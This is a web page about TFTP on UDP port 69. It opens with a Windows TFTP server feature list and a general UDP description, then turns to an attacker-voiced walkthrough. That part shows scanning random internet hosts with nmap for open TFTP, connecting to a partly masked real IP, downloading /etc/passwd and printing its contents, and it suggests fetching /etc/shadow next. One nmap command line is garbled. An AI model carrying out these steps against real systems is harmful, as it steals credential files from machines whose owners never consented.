TFTP (69 UDP)

TFTP (69 UDP)

TFTP-TRIVIAL FILE TRANSFER PROTOCOL

TFTP FEATURE:
* Platform: Windows 2000/XP/2003/Vista/2008/7. TFTP Server is running as background task.
* Implemented as a system Windows service
* Fully compatible with RFC1350, RFC2347, RFC2348 and RFC2349
* Runs as a background "around-the-clock" task
* Ensures flexible access rights setup according to client's IP-address
* Support firewalls: the sever allows indicating the range of UDP-ports, used for transmitting the data. This allows network administrators to regulate firewall rules, approving the traffic, generated by the server.
* Full TFTP option support. The server fully supports the options 'tsize', 'blocksize' and 'timeout', which enables the administrators to reach the maximum performance, when transferring the data.
* An option of setting a highest precedence for the sever process. This option is used in systems with a large number of TFTP-clients and helps to assist them with the maximum speed.
* Contains graphic utilities for server setup and server status control
* High-performance multithreaded architecture

UDP-USER DATAGRAM PROTOCOL

Protocol suite : TCP/IP.
Protocol type : Connectionless transport layer protocol.
IP Protocol : 17.

The User Datagram Protocol offers only a minimal transport service -- non-guaranteed datagram delivery -- and gives applications direct access to the datagram service of the IP layer. UDP is used by applications that do not require the level of service of TCP or that wish to use communications services (e.g., multicast or broadcast delivery) not available from TCP.

UDP is almost a null protocol; the only services it provides over IP are checksumming of data and multiplexing by port number. Therefore, an application program running over UDP must deal directly with end-to-end communication problems that a connection-oriented protocol would have handled -- e.g., retransmission for reliable delivery, packetization and reassembly, flow control, congestion avoidance, etc., when these are required. The fairly complex coupling between IP and TCP will be mirrored in the coupling between UDP and many applications using UDP.

TFTP-TRIVIAL FILE TRANSFER PROTOCOL

TFTP is your friend. TFTP does not require any authentication - it is usually used for network equipment to get their configurations at boot time. A router can be set up to TFTP to a Unix/Windows box and get its config from this box. TFTP makes use of the UDP protocol - and is as such connectionless.

Normally a TFTP server will allow the attacker to transfer any file to him/her (/etc/shadow might be a start). The more recent version of the server will restrict you to only access files that are readable by everyone, and you might find yourself "jailed" in a directory - like with FTP. The other restriction on the more recent servers is that the only files that can be written are those that already exists and that are writeble by everyone. The other difference between TFTP and FTP is that you need to know what file you want - there is no "ls" command, but then again, you can make some intelligent choices.

Let us look at an example (this is really easy, but what the heck). First I use nmap to find a machine out there with an open TFTP port. Note that for this scan (a UDP scan) you'll need to allow UDP (duh) and ICMP to enter your network, as nmap looks at ICMP port unreachable messages to determine if the port is open.

# nmap -+output
n -sU -iR -p 69
>tftp
tftp> connect 129.xxx.121.46
> get /etc/password /tmp/passwd
tftp> get /etc/passwd /tmp/passwd
Received 679 bytes in 1.9 seconds
tftp> q
/> more /tmp/passwd

root:*:0:0:System Administrator:/root:/usr/contrib/bin/bash
daemon:*:1:1:System Daemon:/:/sbin/nologin
sys:*:2:2:Operating System:/tmp:/sbin/nologin
bin:*:3:7:BSDI Software:/usr/bsdi:/sbin/nologin
operator:*:5:5:System Operator:/usr/opr:/sbin/nologin
uucp:*:6:6:UNIX-to-UNIX Copy:/var/spool/uucppublic:/usr/libexec/uucico
games:*:7:13:Games Pseudo-user:/usr/games:/sbin/nologin
news:*:9:8:USENET News,,,:/var/news/etc:/sbin/nologin
demo:*:10:13:Demo User:/usr/demo:/sbin/nologin
www:*:51:84:WWW-server:/var/www:/sbin/nologin
nobody:*:32767:32766:Unprivileged user:/nonexistent:/sbin/nologin
nonroot:*:65534:32766:Non-root root user for NFS:/nonexistent:/sbin/nologin

Note - I transfer the /etc/passwd file to the temp directory. If you do the TFTP as root, and you are not careful, you will overwrite your own /etc/password file :). We have password file - it is shadowed - but we can now easily get any other file (the real password file etc.).